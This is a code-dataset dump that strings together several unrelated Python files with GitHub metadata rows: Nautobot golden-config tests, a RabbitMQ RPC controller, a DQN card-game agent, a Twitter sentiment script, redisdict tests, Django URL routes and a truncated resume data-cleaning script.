    result = get_job_filter(data={"device": Device.objects.get(name="test_device")})
    self.assertEqual(result.count(), 1)

def test_get_job_filter_device_filter_success(self):
    """Verify we get a single device returned when providing single device filter."""
    result = get_job_filter(data={"device": Device.objects.filter(name="test_device")})
    self.assertEqual(result.count(), 1)

def test_get_job_filter_tag_success(self):
    """Verify we get a single device returned when providing tag filter that matches on device."""
    result = get_job_filter(data={"tags": Tag.objects.filter(name="Orphaned")})
    self.assertEqual(result.count(), 1)

def test_get_job_filter_tag_success_and_logic(self):
    """Verify we get a single device returned when providing multiple tag filter that matches on device."""
    device = Device.objects.get(name="orphan_device")
    device_2 = Device.objects.get(name="test_device")
    content_type = ContentType.objects.get(app_label="dcim", model="device")
    tag, _ = Tag.objects.get_or_create(name="second-tag")
    tag.content_types.add(content_type)
    # Only `device` carries BOTH tags; `device_2` has just the new one.
    device.tags.add(tag)
    device_2.tags.add(tag)
    # Default tag logic is an `AND` not and `OR`.
    result = get_job_filter(data={"tags": Tag.objects.filter(name__in=["second-tag", "Orphaned"])})
    self.assertEqual(device.tags.count(), 2)
    self.assertEqual(device_2.tags.count(), 1)
    self.assertEqual(result.count(), 1)

def test_get_job_filter_status_success(self):
    """Verify we get a single device returned when providing status filter that matches on device."""
    result = get_job_filter(data={"status": Status.objects.filter(name="Offline")})
    self.assertEqual(result.count(), 1)

def test_get_job_filter_multiple_status_success(self):
    """Verify we get two devices returned matching multiple status'."""
    result = get_job_filter(data={"status": Status.objects.filter(name__in=["Offline", "Failed"])})
    self.assertEqual(result.count(), 2)

def test_get_job_filter_base_queryset_raise(self):
    """Verify we get raise for having a base_qs with no objects due to bad Golden Config Setting scope."""
    # Point every GoldenConfigSetting at a platform no device uses, so the
    # base queryset becomes empty and get_job_filter must raise E3015.
    Platform.objects.create(name="Placeholder Platform")
    for golden_settings in GoldenConfigSetting.objects.all():
        dynamic_group = DynamicGroup.objects.create(
            name=f"{golden_settings.name} group",
            content_type=self.content_type,
            filter={"platform": ["placeholder-platform"]},
        )
        golden_settings.dynamic_group = dynamic_group
        golden_settings.validated_save()
    with self.assertRaises(NornirNautobotException) as failure:
        get_job_filter()
    self.assertEqual(failure.exception.args[0][:8], "`E3015:`")

def test_get_job_filter_filtered_devices_raise(self):
    """Verify we get raise for having providing site that doesn't have any devices in scope."""
    location_type = LocationType.objects.create(name="New Location Type Site")
    Location.objects.create(name="New Site", status=Status.objects.get(name="Active"), location_type=location_type)
    with self.assertRaises(NornirNautobotException) as failure:
        get_job_filter(data={"location": Location.objects.filter(name="New Site")})
    self.assertEqual(failure.exception.args[0][:8], "`E3016:`")

def test_get_job_filter_device_no_platform_raise(self):
    """Verify we get raise for not having a platform set on a device."""
    device = Device.objects.get(name="test_device")
    device.platform = None
    device.status = Status.objects.get(name="Active")
    device.validated_save()
    with self.assertRaises(NornirNautobotException) as failure:
        get_job_filter()
    self.assertEqual(failure.exception.args[0][:8], "`E3017:`")

def test_device_to_settings_map(self):
    """Verify Golden Config Settings are properly mapped to devices."""
    test_device = Device.objects.get(name="test_device")
    orphan_device = Device.objects.get(name="orphan_device")
    self.assertEqual(self.device_to_settings_map[test_device.id], self.test_settings_c)
    self.assertEqual(self.device_to_settings_map[orphan_device.id], self.test_settings_b)
    # An empty queryset must produce an empty map.
    self.assertEqual(get_device_to_settings_map(queryset=Device.objects.none()), {})
| nautobot/nautobot-plugin-golden-config | nautobot_golden_config/tests/test_utilities/test_helpers.py | test_helpers.py | py | 15,315 | python | en | code | 91 | github-code | 36 | [
{
"api_name": "django.test.TestCase",
"line_number": 23,
"usage_type": "name"
},
{
"api_name": "unittest.mock.MagicMock",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "nautobot.extras.models.GitRepository.objects.all",
"line_number": 30,
"usage_type": "call"
... |
38511488026 | import json
from modules.core.log_service.log_service import Logger_Service, TRACE_LOG_LEVEL, ERROR_LOG_LEVEL
from modules.core.rabbitmq.messages.status_response import StatusResponse, ERROR_STATUS_CODE
from modules.core.rabbitmq.messages.identificators import MESSAGE_TYPE, MESSAGE_PAYLOAD
from modules.core.rabbitmq.rpc.rpc_base_handler import RpcBaseHandler
class RpcApiController:
    """Routes incoming JSON RPC messages to the handler registered for their type.

    Every entry point returns a serialized StatusResponse string, even on error.
    """

    def __init__(self, logger_service: Logger_Service):
        self.logger_service = logger_service
        # FIX: the annotation was the set literal `{str, RpcBaseHandler}` (evaluated
        # at runtime); this is a mapping message-type -> handler. The string
        # annotation keeps it purely declarative.
        self.handlers: 'dict[str, RpcBaseHandler]' = {}
        self.TAG = self.__class__.__name__

    def subscribe(self, handler: RpcBaseHandler):
        """Register `handler` under its message_type; first registration wins."""
        # Renamed local from `type`, which shadowed the builtin.
        message_type = handler.message_type
        if message_type not in self.handlers:
            self.handlers[message_type] = handler

    def received(self, message: str) -> str:
        """Parse a raw JSON message, dispatch it, and return the serialized response.

        Any failure (bad JSON, unknown type, handler error) is logged and turned
        into an error StatusResponse instead of propagating.
        """
        if message is None:
            return self.send_response(self.generate_exception_response('Message is None'))
        try:
            self.logger_service.trace(self.TAG, str(message))
            obj = json.loads(message)
            message_type = obj[MESSAGE_TYPE]
            payload = obj[MESSAGE_PAYLOAD]
            response: StatusResponse = self.handlers[message_type].execute(payload)
            return self.send_response(response)
        except Exception as e:
            error_message = f'Internal exception. \n Error: {e} \n Message: {message}'
            self.logger_service.error(self.TAG, error_message)
            response: StatusResponse = self.generate_exception_response(error_message)
            return self.send_response(response)

    def send_response(self, response: StatusResponse) -> str:
        """Serialize a StatusResponse to its JSON wire format."""
        return json.dumps(response.serialize())

    def generate_exception_response(self, message: str) -> StatusResponse:
        """Build an error StatusResponse carrying `message`."""
        return StatusResponse(message, ERROR_STATUS_CODE)
| dimterex/core_services | modules/core/rabbitmq/rpc/rcp_api_controller.py | rcp_api_controller.py | py | 1,794 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "modules.core.log_service.log_service.Logger_Service",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "modules.core.rabbitmq.rpc.rpc_base_handler.RpcBaseHandler",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "modules.core.rabbitmq.rpc.rpc_base_... |
74834158185 | import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
# utils
from extra.utils import trans_vector, get_cards_small_extend, calculate_score, avg_score
# config
from extra.config import original_vec, LR, MEMORY_CAPACITY, BATCH_SIZE, GAMMA
class QNet(nn.Module):
    """MLP Q-value network: 209-dim (action + state) input -> scalar Q value."""

    def __init__(self, ):
        super(QNet, self).__init__()
        self.fc1 = nn.Linear(209, 256)
        self.fc1.weight.data.normal_(0, 0.1)   # initialization
        self.fc2 = nn.Linear(256, 128)
        self.fc2.weight.data.normal_(0, 0.1)   # initialization
        self.fc3 = nn.Linear(128, 64)
        self.fc3.weight.data.normal_(0, 0.1)   # initialization
        self.out = nn.Linear(64, 1)
        self.out.weight.data.normal_(0, 0.1)   # initialization

    def forward(self, x):
        """Forward pass; dropout (p=0.5) before each ReLU, as in the original.

        FIX: F.dropout defaults to training=True regardless of module mode, so
        the original network stayed stochastic even after .eval(). Gate each
        dropout on self.training so evaluation is deterministic.
        """
        x = self.fc1(x)
        x = F.dropout(x, p=0.5, training=self.training)
        x = F.relu(x)
        x = self.fc2(x)
        x = F.dropout(x, p=0.5, training=self.training)
        x = F.relu(x)
        x = self.fc3(x)
        x = F.dropout(x, p=0.5, training=self.training)
        x = F.relu(x)
        actions_value = self.out(x)
        return actions_value
class DQN(object):
    """DQN agent for the card game.

    Replay-memory row layout (277 columns), as established by the slicing in
    learn()/store_transition():
      col 0        : player position code (1=A, 2=B, 3=C)
      cols 1..143  : action encoding (143 dims)
      cols 144..209: current state (66 dims)
      cols 210..275: next state (66 dims)
      col -1       : reward (filled in later by add_reward)
    """

    def __init__(self):
        # double Q-learning for TD methods setting
        self.eval_net, self.target_net = QNet(), QNet()
        self.device = ("cuda" if torch.cuda.is_available() else "cpu")
        # if torch.cuda.device_count() > 1:
        #     self.eval_net = nn.DataParallel(self.eval_net, device_ids=[0, 1, 2])
        #     self.target_net = nn.DataParallel(self.target_net, device_ids=[0, 1, 2])
        self.eval_net.to(self.device)
        self.target_net.to(self.device)
        self.MEMORY_CAPACITY = MEMORY_CAPACITY
        self.memory_counter = 0    # for storing memory
        self.memory_counter_ = 0   # for storing memory (start of the current episode)
        self.memory = np.zeros((self.MEMORY_CAPACITY, 277))   # initialize memory
        self.optimizer = torch.optim.Adam(self.eval_net.parameters(), lr=LR)
        self.loss_func = nn.MSELoss()
        self.loss_func.cuda().to(self.device)

    def learn(self):
        """One TD update on a random minibatch; returns (loss, mean Q)."""
        # sample batch transitions
        sample_index = np.random.choice(MEMORY_CAPACITY, BATCH_SIZE)
        b_memory = self.memory[sample_index, :]
        b_s = torch.FloatTensor(b_memory[:, 1 + 143:1 + 143 + 66])
        b_s_ = torch.FloatTensor(b_memory[:, 1 + 143 + 66:1 + 143 + 66 + 66])
        b_a = torch.FloatTensor(b_memory[:, 1:1 + 143])
        b_r = torch.FloatTensor(b_memory[:, -1])
        # Q-network input is the concatenation (action, state).
        input = torch.cat((b_a, b_s), 1).to(self.device)
        input_ = torch.cat((b_a, b_s_), 1).to(self.device)
        # double Q-learning for TD methods setting
        q_eval = self.eval_net(input).squeeze()   # shape (batch, 1)
        q_next = self.target_net(input_).squeeze()
        q_target = b_r.to(self.device) + GAMMA * q_next
        loss = self.loss_func(q_eval, q_target)
        self.optimizer.zero_grad()
        loss.backward()
        self.optimizer.step()
        return loss.item(), q_eval.data.cpu().numpy().mean()

    def choose_action(self, player, EPSILON, ways_toplay=[]):
        """Epsilon-greedy action selection over the player's legal plays.

        NOTE(review): `ways_toplay=[]` is a mutable default argument; callers
        appear to supply it only when player.status == 0 — confirm before fixing.
        Returns the chosen cards as a list ([] when no legal play exists).
        """
        status = player.status
        if status == np.array([0]):
            pattern_to_playcards = [player.current_pattern]
        else:
            pattern_to_playcards = player.search_pattern()
        biggest_w = 0
        biggest_p = 0
        biggest_temp = 0
        ways_list = []
        lp = len(pattern_to_playcards)
        for p in range(lp):
            if status == np.array([1]):
                ways_toplay = player.search_play_methods(pattern_to_playcards[p])
            if len(ways_toplay) == 0:
                return []
            ways_list.append(ways_toplay)
            lw = len(ways_toplay)
            for w in range(lw):
                # Score every (pattern, way) pair with the eval network and
                # remember the argmax.
                action_small_extend = get_cards_small_extend(ways_toplay[w], pattern_to_playcards[p])
                player_state = player.get_state()
                input = np.concatenate((action_small_extend, player_state), axis=0)
                input = torch.from_numpy(input).float().to(self.device)
                temp = self.eval_net(input)
                if temp >= biggest_temp:
                    biggest_w = w
                    biggest_p = p
                    biggest_temp = temp
        if np.random.uniform() > EPSILON:   # greedy
            biggest_p = np.random.randint(0, lp)
            lw = len(ways_list[biggest_p])
            biggest_w = np.random.randint(0, lw)
        action_cards = ways_list[biggest_p][biggest_w]
        player.current_pattern = pattern_to_playcards[biggest_p]
        # action_Q = biggest_temp
        if type(action_cards) == int:
            action_cards = [action_cards]
        return action_cards

    # After each play, store the state s, the action a and the player's seat
    # (A/B/C); when the round ends, rewards are assigned per seat by add_reward.
    def store_transition(self, player, action_cards, current_state):
        pattern = player.current_pattern
        cards_small_extend = get_cards_small_extend(action_cards, pattern)
        current_position = player.position
        if current_position == 'player_A':
            position = 1
        if current_position == 'player_B':
            position = 2
        if current_position == 'player_C':
            position = 3
        position = np.array([position])
        next_state = player.get_state()
        # Reward slot is a placeholder until add_reward fills it at episode end.
        r_placeholder = np.array([0])
        input = np.concatenate((position, cards_small_extend, current_state, next_state, r_placeholder), axis=0)
        # replace the old memory with new memory
        index = self.memory_counter % MEMORY_CAPACITY
        self.memory[index, :] = input
        self.memory_counter += 1

    # At the end of each round, write the rewards into this episode's transitions.
    def add_reward(self, player):
        # get info from current player
        winner = player.position
        next_player = player.get_next_player()
        next_next_player = next_player.get_next_player()
        loser_one = next_player.position
        loser_two = next_next_player.position
        loser_one_cards = next_player.cards
        loser_two_cards = next_next_player.cards
        if winner == 'player_A':
            winner_position = 1
        elif winner == 'player_B':
            winner_position = 2
        elif winner == 'player_C':
            winner_position = 3
        if loser_one == 'player_A':
            loser_one_position = 1
        elif loser_one == 'player_B':
            loser_one_position = 2
        elif loser_one == 'player_C':
            loser_one_position = 3
        if loser_two == 'player_A':
            loser_two_position = 1
        elif loser_two == 'player_B':
            loser_two_position = 2
        elif loser_two == 'player_C':
            loser_two_position = 3
        # Walk only this episode's transitions: [memory_counter_, memory_counter).
        for i in range(self.memory_counter - self.memory_counter_):
            index = self.memory_counter_ % MEMORY_CAPACITY
            temp = (index + i) % MEMORY_CAPACITY
            # score the win/loss: losers are penalised by their remaining cards
            loser_one_cards_small = trans_vector(loser_one_cards)
            loser_two_cards_small = trans_vector(loser_two_cards)
            loser_one_score = calculate_score(loser_one_cards_small)
            loser_two_score = calculate_score(loser_two_cards_small)
            winner_score = 0
            if self.memory[temp, 0] == winner_position:
                self.memory[temp, -1] = winner_score
            elif self.memory[temp, 0] == loser_one_position:
                self.memory[temp, -1] = loser_one_score
            elif self.memory[temp, 0] == loser_two_position:
                self.memory[temp, -1] = loser_two_score
        self.memory_counter_ = self.memory_counter
| zawnpn/RL_RunFast | RL_framework/DQN.py | DQN.py | py | 7,819 | python | en | code | 6 | github-code | 36 | [
{
"api_name": "torch.nn.Module",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "torch.nn.Linear",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_nu... |
40309505708 | # 1261
from collections import deque

# Sentinel cost: larger than any reachable number of broken walls.
ARR_MAX = 10001
# Row/column offsets of the four neighbours: left, right, down, up.
da = [0, 0, 1, -1]
db = [-1, 1, 0, 0]


def BFS(N, M, arr, visited):
    """0-1 BFS over an M-row x N-column grid of '0' (empty) / '1' (wall) chars.

    `visited` must come pre-filled with ARR_MAX; on return, visited[r][c] is
    the minimum number of walls broken to reach (r, c) from (0, 0).
    Returns the cost of reaching the bottom-right cell (M-1, N-1).
    """
    deq = deque()
    deq.append([0, 0])
    visited[0][0] = 0
    while len(deq):
        ca, cb = deq.popleft()
        for direction in range(0, 4):
            na = ca + da[direction]
            nb = cb + db[direction]
            if na < 0 or na >= M or nb < 0 or nb >= N:
                continue
            if arr[na][nb] == '0' and visited[na][nb] > visited[ca][cb]:
                visited[na][nb] = visited[ca][cb]
                # FIX: a 0-weight edge must go to the FRONT of the deque
                # (0-1 BFS invariant); plain append degraded the algorithm
                # to repeated relaxation with redundant re-queues.
                deq.appendleft([na, nb])
            elif arr[na][nb] == '1' and visited[na][nb] > visited[ca][cb] + 1:
                visited[na][nb] = visited[ca][cb] + 1
                deq.append([na, nb])
    return visited[M - 1][N - 1]
if __name__ == "__main__":
    # Read grid dimensions: N = width (columns), M = height (rows).
    N, M = map(int, input().split())
    arr = []
    visited = []
    for i in range(0, M):
        # Each maze row is a string of '0'/'1' characters, stored as a char list.
        arr.append(list(input()))
        # Initialise every cell's best-known cost with the ARR_MAX sentinel.
        tmp = []
        for j in range(0, N):
            tmp.append(ARR_MAX)
        visited.append(tmp)
print(BFS(N, M, arr, visited)) | gus-an/algorithm | 2020/05-3/bfs_1261.py | bfs_1261.py | py | 1,180 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "collections.deque",
"line_number": 9,
"usage_type": "call"
}
] |
42285770606 | # -*- coding: utf-8 -*-
from __future__ import absolute_import
import logging
import redis
import datetime
import uuid
import collections
import unittest
from redisdict.redisdict import SimpleRedisDict, ComplexRedisDict, _config
from redisdict.exceptions import SerialisationError
from redisdict import configure
logger = logging.getLogger('redisdict')
logger.setLevel(logging.DEBUG)
class _RedisDictTestCase(unittest.TestCase):
    """Shared scaffold; subclasses override `klass` with the dict flavour under test."""

    klass = SimpleRedisDict
    name = 'dct'

    def setUp(self):
        # Recreate the redis-backed dict with autoclean so each test starts empty.
        self.klass(self.name, {}, autoclean=True)  # clean it up

    def test_init_empty(self):
        self.klass(self.name, {})

    def test_key_not_exist(self):
        # FIX: the redis key name was mistakenly `self.klass` (the class object)
        # instead of the designated test key name used everywhere else.
        cloud = self.klass(self.name, {'name': 'Jim'})
        cloud['name']
        with self.assertRaises(KeyError):
            cloud['age']

    def test_delete(self):
        pass

    def test_resolve_options(self):
        pass
class SimpleRedisDictCase(_RedisDictTestCase):
    """SimpleRedisDict stores every value as its string representation."""

    klass = SimpleRedisDict

    def test_dict(self):
        origin = {
            'name': 'Jim',
            'age': 5,
        }
        # FIX: the redis key name was mistakenly `self.klass` (the class object);
        # use the shared test key name like the other tests.
        cloud = SimpleRedisDict(self.name, origin)
        for k, v in origin.items():
            value_in_cloud = cloud[k]
            self.assertIsInstance(value_in_cloud, str)
            self.assertEqual(value_in_cloud, str(v))

    def test_raise_error(self):
        # None cannot be serialised by the simple dict.
        with self.assertRaises(SerialisationError):
            self.klass(self.name, {'name': None})

    def test_with_default_dict(self):
        v = 'value of default dict'
        dct = collections.defaultdict(lambda: v)
        cloud = self.klass(self.name, dct)
        # A missing key falls back to the defaultdict factory value.
        self.assertEqual(cloud[str(uuid.uuid4())], v)

    def test_lock(self):
        cloud = self.klass(self.name, {})
        with cloud.Lock():
            cloud['info'] = 'blah blah'
class ComplexRedisDictCase(_RedisDictTestCase):
    """ComplexRedisDict round-trips values while preserving their Python types."""

    klass = ComplexRedisDict

    def test_dict(self):
        source = {
            'name': 'Jim',
            'birth': datetime.date.today(),
            'id': uuid.uuid4(),
            'address': None,
        }
        stored = self.klass(self.name, source)
        for key, expected in source.items():
            # Each value must come back equal (and typed), not stringified.
            self.assertEqual(expected, stored[key])
class ConfigTestCase(unittest.TestCase):
    """configure() should install the supplied redis client into the module config."""

    def test_configure_client(self):
        redis_client = redis.Redis()
        configure(client=redis_client)
        # The exact same client object must be held by the config singleton.
        self.assertIs(redis_client, _config.client)
| Kxrr/redisdict | redisdict/tests/test_redis_dict.py | test_redis_dict.py | py | 2,395 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "logging.DEBUG",
"line_number": 16,
"usage_type": "attribute"
},
{
"api_name": "unittest.TestCase",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "redisdict... |
25464280623 | from django.urls import path, re_path
from . import views
urlpatterns = [
    # Order matters: Django tries patterns top-to-bottom, and several routes
    # below use greedy `.*` captures, so the more specific conference
    # sub-routes must stay ahead of the bare conference route.
    path('', views.view_index, name='index'),
    re_path('^conference/(?P<cslug>.*)/new$', views.view_new_event, name='new_event'),
    re_path('^conference/(?P<cslug>.*)/(?P<eguid>.*)$', views.view_event, name='event'),
    re_path('^conference/(?P<cslug>.*)$', views.view_conference, name='conference'),
    # Machine-readable schedule exports keyed by conference slug.
    re_path('^schedule/(?P<cslug>.*).json$', views.view_schedulejson, name='schedulejson'),
    re_path('^schedule/(?P<cslug>.*).xml$', views.view_schedulexml, name='schedulexml'),
]
| voc/voctoimport | event/urls.py | urls.py | py | 565 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.urls.path",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "django.urls.re_path",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "django.urls.re_path",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "django.urls.re_... |
38507493376 | #Following code to authenticate with twitters API is from @llSourcell on github.
import csv

import tweepy
from textblob import TextBlob

# Use tweepy to authenticate with twitter's API. The following keys have been
# removed because they are unique to my twitter profile. Get yours at twitter.com.
consumer_key = ''
consumer_secret = ''
access_token = ''
access_token_secret = ''

auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
api = tweepy.API(auth)

# Thresholds: polarity >= `positive` counts as positive sentiment; only tweets
# with subjectivity >= `subjectivity` are considered on-topic enough to keep.
positive = 0
subjectivity = 0.4

# Ask the user for a keyword and retrieve tweets.
keyword = input("Enter a keyword you want to search on twitter: ")
public_tweets = api.search(q=keyword, count=10)

# Collect (tweet, sentiment label) pairs.
dic = {'Tweet': [], 'Sentiment Rating': []}
for tweet in public_tweets:
    # Analyse each tweet once instead of rebuilding the TextBlob per check.
    sentiment = TextBlob(tweet.text).sentiment
    if sentiment[1] >= subjectivity:
        dic['Tweet'].append(tweet.text)
        if sentiment[0] >= positive:
            dic['Sentiment Rating'].append('Positive')
        else:
            dic['Sentiment Rating'].append('Negative')

# Write results to a CSV file.
# FIX: the original wrote rows by hand, so tweets containing commas/newlines
# corrupted the file, and its row counter was never incremented (every row got
# the first tweet's sentiment). csv.writer quotes fields correctly and zip
# pairs each tweet with its own rating; `with` guarantees the file is closed.
filename = 'tweets.csv'
with open(filename, 'w', newline='', encoding='utf-8') as output_file:
    writer = csv.writer(output_file)
    writer.writerow(['Tweet', 'Sentiment Rating'])
    writer.writerows(zip(dic['Tweet'], dic['Sentiment Rating']))
| DevonWright/twitter_sentiment_analysis | twitter_sentiment_analysis.py | twitter_sentiment_analysis.py | py | 1,962 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "tweepy.OAuthHandler",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "tweepy.API",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "textblob.TextBlob",
"line_number": 37,
"usage_type": "call"
},
{
"api_name": "textblob.TextBlob",
... |
10238662829 | import numpy as np
import pandas as pd #для анализа и предобработки данных
from utils.reader_config import config_reader
from models.models_collection import ModelRandomForest
from sklearn import preprocessing #предобработка
from sklearn.model_selection import train_test_split #сплитование выборки
from sklearn import metrics #метрики
# Импортируем константы из файла config
config = config_reader('config/config.json')
def education_level(arg):
    """Classify a raw education string into one of four categories.

    Returns 'higher', 'higher_unfinished', 'secondary_professional' or
    'secondary'; unknown strings yield pd.NA.
    """
    # The original called arg.lower()/arg.split() and discarded both results
    # (dead code, matching was always done on the raw string) — removed.
    if 'Высшее' in arg:
        return 'higher'
    elif 'Неоконченное высшее' in arg:
        return 'higher_unfinished'
    elif 'Среднее специальное' in arg:
        return 'secondary_professional'
    elif 'Среднее образование' in arg:
        return 'secondary'
    else:
        # FIX: the original evaluated pd.NA without returning it, so the
        # fallback silently produced None instead of the intended missing value.
        return pd.NA
def get_gender(arg):
    """Return 'M' if the string mentions 'Мужчина' (male), otherwise 'F'."""
    # The original called arg.split(' ') and discarded the result — removed.
    return 'M' if 'Мужчина' in arg else 'F'
def get_age(arg):
    """Return the user's age: the fourth whitespace-separated token, as int."""
    tokens = arg.split(' ')
    # assumes the resume header always carries the age at index 3 — TODO confirm
    return int(tokens[3])
def get_experience(arg):
    """Convert a raw experience string to a total number of months.

    Returns np.NaN when experience is missing ('Не указано', None, NaN).
    Expected token layout after split: [.., .., <num>, <unit>, <num>, <unit>].
    """
    year_description = ['лет', 'года', 'год']
    month_description = ['месяц', 'месяца', 'месяцев']
    if arg == 'Не указано' or arg is None or arg is np.NaN:
        return np.NaN
    arg_splitted = arg.split(' ')[:6]
    if arg_splitted[3] in year_description:
        # FIX: the original indexed arg_splitted[5] unconditionally and raised
        # IndexError for strings with only a years part (e.g. 'Опыт работы 5 лет').
        if len(arg_splitted) > 5 and arg_splitted[5] in month_description:
            return int(arg_splitted[2]) * 12 + int(arg_splitted[4])
        return int(arg_splitted[2]) * 12
    # No year unit: the number is already in months.
    return int(arg_splitted[2])
def get_city(arg):
    """Bucket a city string into 'Moscow', 'Petersburg', 'megapolis' or 'other'.

    Only the first whitespace-separated token (the city name) is inspected.
    """
    first_token = arg.split(' ')[0]
    # Russian million-plus cities other than the two capitals.
    million_cities = ['Новосибирск', 'Екатеринбург', 'Нижний Новгород', 'Казань',
                      'Челябинск', 'Омск', 'Самара', 'Ростов-на-Дону', 'Уфа',
                      'Красноярск', 'Пермь', 'Воронеж', 'Волгоград']
    if first_token == 'Москва':
        return 'Moscow'
    if first_token == 'Санкт-Петербург':
        return 'Petersburg'
    if first_token in million_cities:
        return 'megapolis'
    return 'other'
# Definition of relocation willingness
def get_relocation(arg):
    """Return relocation willingness as a bool.

    Only an explicit refusal ('не готов(а) к переезду') yields False; every
    other phrasing — including 'хочу переехать' and silence — yields True,
    exactly as the original branch structure did.
    """
    refuses = ('не готов к переезду' in arg) or ('не готова к переезду' in arg)
    return not refuses
def get_bisiness_trips(arg):
    """Return business-trip readiness as a bool.

    False when trips are not mentioned at all, or when the string explicitly
    refuses them ('не готов(а) к командировкам'); True otherwise.
    """
    if 'командировка' not in arg:
        return False
    refuses = ('не готов к командировкам' in arg) or ('не готова к командировкам' in arg)
    return not refuses
# Definition of currency
def get_currency_in_ISO_format(arg):
    """Map the currency token of a salary string to its ISO 4217 code.

    The token is the second whitespace-separated word, with any dots stripped
    (e.g. '50000 руб.' -> 'руб' -> 'RUB').
    """
    token = arg.split(' ')[1].replace('.', "")
    # international currency codes
    currencies_in_ISO_dict = {
        'грн': 'UAH',
        'USD': 'USD',
        'EUR': 'EUR',
        'белруб': 'BYN',
        'KGS': 'KGS',
        'сум': 'UZS',
        'AZN': 'AZN',
        'KZT': 'KZT'
    }
    return 'RUB' if token == 'руб' else currencies_in_ISO_dict[token]
def get_aggregated_status(arg1, arg2):
    """Aggregate relocation/business-trip readiness into one label.

    arg1 = relocation readiness, arg2 = business-trip readiness — this matches
    the call site `data[['Relocation', 'Business_trip']].apply(...)`.

    FIX 1: the original returned 'ready_for_relocation' for (False, True) and
    'ready_for_business_trips' for (True, False) — labels were swapped relative
    to the argument order. FIX 2: `arg1 is True` identity checks fail for
    numpy bools coming out of a pandas bool column (everything collapsed to
    'not_ready'); plain truthiness is used instead.
    """
    if arg1 and arg2:
        return 'ready_for_relocation_and_business_trips'
    elif arg1 and not arg2:
        return 'ready_for_relocation'
    elif not arg1 and arg2:
        return 'ready_for_business_trips'
    else:
        return 'not_ready'
def outliers_z_score_mod(data, feature, left=3, right=3, log_scale=False):
    """Split a DataFrame into (outliers, cleaned) with the z-score method.

    Args:
        data: source DataFrame.
        feature: column to test for outliers.
        left, right: sigma multipliers for the lower/upper bound (default 3).
        log_scale: if True, bounds are computed on log-transformed values.

    Returns:
        (outliers, cleaned) — two DataFrames that partition `data`.
    """
    x = np.log(data[feature]) if log_scale else data[feature]
    mu = x.mean()
    sigma = x.std()
    lower_bound = mu - left * sigma
    upper_bound = mu + right * sigma
    # FIX: the original used strict inequalities for BOTH subsets, so rows
    # exactly on a bound landed in neither frame. Using one mask and its
    # complement guarantees outliers + cleaned == data.
    outlier_mask = (x < lower_bound) | (x > upper_bound)
    outliers = data[outlier_mask]
    cleaned = data[~outlier_mask]
    return outliers, cleaned
def get_profession(arg: str) -> str:
    """Unify raw job titles into coarse profession categories.

    Checks run in priority order; the first matching category wins.

    FIX: the original tested `('слово1' and 'слово2') in arg`, which in Python
    only checks the LAST word, and `('a' or 'b') in arg`, which only checks the
    FIRST — the multi-word intent stated in the comments never worked. Each
    word is now tested individually. Also fixes the Latin-'a' typo in
    'aналитик', which could never match the Cyrillic word.
    """
    arg = arg.lower().replace("-", " ").replace("веб", "web")
    if 'программист' in arg or 'разработчик' in arg:
        return "programmer"
    elif 'дизайнер' in arg:
        return 'designer'
    elif 'аналитик' in arg:
        return 'analyst'
    elif 'главный' in arg and 'специалист' in arg:
        return 'leading specialist'
    elif 'продавец' in arg:
        return 'salesman'
    elif 'системный' in arg and 'администратор' in arg:
        return 'sys admin'
    elif 'менеджер по продажам' in arg:
        return 'sales manager'
    elif 'ведущий инженер' in arg:
        return 'leading engineer'
    elif ('руководитель' in arg or 'менеджер' in arg) and ('проекта' in arg or 'проектов' in arg):
        return 'project manager'
    elif 'начальник' in arg or 'руководитель' in arg or 'заведующий' in arg:
        return 'unit head'
    elif 'менеджер' in arg or ('заместитель' in arg and 'руководителя' in arg):
        return 'manager'
    elif 'директор' in arg:
        return 'director'
    elif 'инженер' in arg:
        return 'engineer'
    elif 'маркетолог' in arg:
        return 'marketing specialist'
    elif 'техник' in arg or 'монтажник' in arg:
        return 'technicien'
    elif 'администратор' in arg or 'administrator' in arg or 'reception' in arg:
        return 'administrator'
    else:
        return 'other'
# Define metrics
def print_metrics(y_train, y_train_predict, y_test, y_test_predict):
    """Print R^2, MAE and MAPE for both the train and the test predictions."""
    print('Train R^2: {:.3f}'.format(metrics.r2_score(y_train, y_train_predict)))
    print('Train MAE: {:.0f} rub.'.format(metrics.mean_absolute_error(y_train, y_train_predict)))
    print('Train MAPE: {:.0f} %'.format(metrics.mean_absolute_percentage_error(y_train, y_train_predict)*100))
    print('\n')
    print('Test R^2: {:.3f}'.format(metrics.r2_score(y_test, y_test_predict)))
    print('Test MAE: {:.0f} rub.'.format(metrics.mean_absolute_error(y_test, y_test_predict)))
    # FIX: this line printed the test MAPE under the label 'Train MAPE'.
    print('Test MAPE: {:.0f} %'.format(metrics.mean_absolute_percentage_error(y_test, y_test_predict)*100))
def get_result():
# get data
data = pd.read_csv('data/dst-3.0_16_1_hh_database.zip', sep=';')
# Apply the function to the DataFrame
data['Education'] = data['Образование и ВУЗ'].apply(education_level)
# delete the feature 'Образование и ВУЗ'
data.drop(['Образование и ВУЗ'], axis=1, inplace=True)
# Creation of a new feature 'Gender'
data['Gender'] = data['Пол, возраст'].apply(get_gender)
# Creation of a new feature 'Age'
data['Age'] = data['Пол, возраст'].apply(get_age)
# Delete original feature
data.drop(['Пол, возраст'], axis=1, inplace=True)
data["User_experience(months)"] = data['Опыт работы'].apply(get_experience)
# Deleting the original feature 'Опыт работы'
data.drop(['Опыт работы'], axis=1, inplace=True)
# City cathegorization using the function 'get_city'
data['City'] = data['Город, переезд, командировки'].apply(get_city)
